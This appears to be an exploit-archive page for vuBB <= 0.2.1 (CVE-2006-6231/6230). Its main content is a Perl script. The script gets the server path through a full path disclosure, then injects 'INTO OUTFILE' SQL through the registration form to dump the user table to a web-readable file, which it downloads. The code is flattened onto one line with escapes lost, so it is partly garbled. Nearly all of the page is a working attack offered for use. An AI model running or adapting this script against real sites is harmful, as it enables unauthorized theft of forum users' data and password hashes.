vuBB <= 0.2.1 [BFA] SQL Injection Exploit + Advisory link

2006.12.05
Credit: DarkFig
Risk: Medium
Local: No
Remote: Yes
CVE: CVE-2006-6231 | CVE-2006-6230
CWE: CWE-89

#!/usr/bin/perl # # by DarkFig -- acid-root.new.fr # French Advisory (vuBB <= 0.2.1 [BFA] SQL Injection, XSS, CRLF Injection, Full Path Disclosure): http://www.acid-root.new.fr/advisories/vubb021b.txt # use IO::Socket; use LWP::Simple; # Header print "rn+---------------------------------------+", "rn"; print "| vuBB <= 0.2.1 [BFA] SQL Injection -|", "rn"; print "+---------------------------------------+", "rn"; # Usage if(!$ARGV[2]){ print "| Usage: <host> <path> <username> ------|", "rn"; print "+---------------------------------------+", "rn"; exit; } # Host if($ARGV[0] =~ /http://(.*)/){ $host = $1; } else { $host = $ARGV[0]; } print "[+]Host: $hostrn"; # Var my $path = $ARGV[1]; my $user = $ARGV[2]; print "[+]User: $userrn"; my $port = 80; my $fpd = "http://".$host.$path."includes/vubb.php"; my $err1 = "[-]Can't connect to the hostrn"; my $err2 = "[-]Can't retrieve the full pathrn"; my $err3 = "[-]Can't retrieve the resultsrn"; my $poti = "POST "."$path"."index.php?act=register&action=register"." HTTP/1.1"; # Full Path Disclosure $req0 = get($fpd) or die print $err1 and end(); if($req0 =~ /in <b>(.*)/includes/vubb.php</b>/) { $fullpath = $1."/thisismypasswd.txt"; print "[+]Path: $1rn"; } else { print $err2 and end(); } # Malicious data my $pdat = "user=$user"."%27+INTO+OUTFILE+%27"."$fullpath"."%27%23"."&email=a669c45 70f%40hotmail.com&vemail=a669c4570f%40hotmail.com&pass=mypassword&vpass= mypassword&agreement=iacceptohackit&agree=on"; my $ldat = length $pdat; my $req1 = IO::Socket::INET->new( PeerAddr => $host, PeerPort => $port, Proto => "tcp" ) or print $err1 and end(); print $req1 "$poti", "rn"; print $req1 "Host: $host", "rn"; print $req1 "Content-Type: application/x-www-form-urlencoded", "rn"; print $req1 "Content-Length: $ldat", "rnn"; print $req1 "$pdat", "rn"; close($req1); # Results $req2 = get("http://".$host.$path."/thisismypasswd.txt") or print $err3 and end(); open(f, ">VUBB_RESULT.txt"); print f $req2; close(f); print "[+]Done: VUBB_RESULT.txtrn"; end(); # Bye sub end { print "+---------------------------------------+", "rn"; exit; }


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top